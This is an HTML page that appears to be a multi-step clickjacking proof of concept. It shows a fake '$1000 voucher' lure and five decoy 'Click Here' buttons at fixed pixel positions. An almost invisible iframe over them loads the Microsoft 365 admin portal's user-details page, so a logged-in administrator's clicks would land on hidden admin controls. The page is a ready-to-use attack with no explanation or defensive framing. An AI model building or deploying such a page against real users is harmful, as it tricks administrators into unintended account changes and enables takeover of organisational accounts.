<!DOCTYPE html>
<html>
<head>
	<title>Copy Voucher Code to Clipboard</title>
	<style>
		iframe {
			position:relative;
			width: 100%;
			height: 650px;
			opacity: 0.01;
			z-index: 2;
		}
		.firstClick, .secondClick, .thirdClick, .fourthClick, .fifthClick, .sixthClick, .sevenClick, h1 {
			position:absolute;
			top:330px;
			z-index: 1;
		}
		.firstClick {
			left: 402px;
			top: 559px;
		}
		.secondClick {
			left: 1223px;
			top: 566px;
		}
		.thirdClick {
			left: 937px;
			top: 366px;
		}
		.fourthClick {
			left: 960px;
			top: 509px;
		}
		.fifthClick {
			left: 993px;
			top: 619px;
                }
		.sixthClick {
			left: 678px;
			top: 212px;
	        }
		.sevenClick {
			left: 716px;
			top: 440px;
		}
		h1 {
			left: 374px;
			top: 143px;
		}
	</style>
</head>
<body>
	<h1>Congrats You Won $1000 Voucher Follow the step & claim voucher</h1>
	<button class="firstClick">click Here 1</button>
	<button class="secondClick">Click Here 2</button>
	<button class="thirdClick">Click Here 3</button>
	<button class="fourthClick">Click Here 4</button>
	<button class="fifthClick">Claim</button>
        
	
	<iframe src="https://admin.microsoft.com/adminportal/home?#/users/:/UserDetails/" width="100%" height="100%"></iframe>






